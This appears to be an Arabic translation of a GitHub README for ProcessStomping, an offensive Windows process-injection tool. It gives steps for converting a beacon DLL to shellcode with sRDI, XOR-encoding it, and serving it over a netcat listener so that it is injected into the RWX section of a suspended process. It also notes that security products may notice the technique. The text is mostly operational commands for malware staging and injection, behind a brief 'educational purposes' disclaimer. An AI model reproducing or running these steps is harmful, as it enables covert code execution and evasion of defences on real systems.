
تنويع من ProcessOverwriting لتنفيذ شيلكود على قسم من ملف قابل للتنفيذ
تنويع من ProcessOverwriting لتنفيذ شيلكود على قسم من ملف تنفيذي
للحصول على شرح أكثر تفصيلاً، يمكنك قراءة منشور مدونتي
Process Stomping هو تنويع من Process Overwriting لـ hasherezade ويتميز بكتابة حمولة شيلكود على قسم مستهدف بدلاً من كتابة حمولة PE كاملة على مساحة عنوان العملية المضيفة.
فيما يلي الخطوات الرئيسية لتقنية ProcessStomping:
كتطبيق مثال على هذه التقنية، يمكن استخدام الإثبات العملي (PoC) مع sRDI لتحميل مكتبة ارتباط ديناميكي (dll) لنظام beacon عبر قسم RWX لملف تنفيذي. تصف الصورة التالية الخطوات المتضمنة.

جميع المعلومات والمحتوى مقدمة لأغراض تعليمية فقط. اتبع التعليمات على مسؤوليتك الخاصة. لا يتحمل المؤلف ولا صاحب عمله أي مسؤولية عن أي ضرر مباشر أو تبعي أو خسارة ناتجة عن أي شخص أو منظمة.
أصبح هذا العمل ممكنًا بفضل المعرفة والأدوات التي شاركتها ألكسندرا دونيتس @hasherezade ونيك لاندرز.
اختر العملية المستهدفة وقم بتعديل المتغيرات العامة وفقًا لذلك في ProcessStomping.cpp.
قم بتجميع مشروع sRDI مع التأكد من أن الإزاحة كافية لتجاوز كتلة شيلكود sRDI المولدة، ثم قم بتحديث أدوات sRDI:
cd \sRDI-master
python .\lib\Python\EncodeBlobs.py .\
قم بإنشاء حمولة dll بدون محمل انعكاسي (Reflective-Loaderless) من اختيارك، ثم قم بإنشاء كتلة شيلكود sRDI:
python .\lib\Python\ConvertToShellcode.py -b -f "changethedefault" .\noRLx86.dll
يمكن بعد ذلك إجراء XOR لكتلة الشيلكود مع كلمة مفتاحية وتنزيلها باستخدام مقبس بسيط
python xor.py noRLx86.bin noRLx86_enc.bin Bangarang
قم بتسليم الكتلة المشفرة بـ XOR عند الاتصال
nc -vv -l -k -p 8000 -w 30 < noRLx86_enc.bin
سيتم مسح كتلة sRDI بعد التنفيذ لإزالة القطع الأثرية غير الضرورية.
https://github.com/naksyn/ProcessStomping/assets/59816245/8d9e1ac2-b47c-41d5-9f0e-1b3fee14ba50
لتنفيذ هذه التقنية بنجاح، يجب عليك اختيار العملية المستهدفة الصحيحة واستخدام حمولة dll لا تأتي مع محمل انعكاسي مخصص من قبل المستخدم.
تتطلب تقنية Process Stomping بدء العملية المستهدفة في حالة معلقة، وتغيير نقطة دخول الخيط، ثم استئناف الخيط لتنفيذ الشيلكود المحقون. هذه عمليات قد تعتبر مشبوهة إذا تم تنفيذها بتتابع سريع وقد تؤدي إلى زيادة التدقيق من قبل بعض حلول الأمان.